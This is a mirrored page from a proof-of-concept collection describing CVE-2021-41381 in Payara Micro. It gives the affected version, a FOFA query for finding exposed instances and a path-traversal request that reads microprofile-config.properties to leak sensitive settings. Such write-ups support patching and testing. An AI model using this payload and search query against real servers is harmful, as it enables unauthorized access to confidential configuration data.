admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

31 lines
536 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
## 漏洞描述
PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取获取敏感信息
## 漏洞影响
```
Payara Micro Community 5.2021.6
```
## FOFA
```
app="Payara-Micro"
```
## 漏洞复现
产品页面
![image-20220525163706617](./images/202205251637689.png)
验证POC
```
/.//WEB-INF/classes/META-INF/microprofile-config.properties
```
![image-20220525163715004](./images/202205251637074.png)
Reference in New Issue View Git Blame Copy Permalink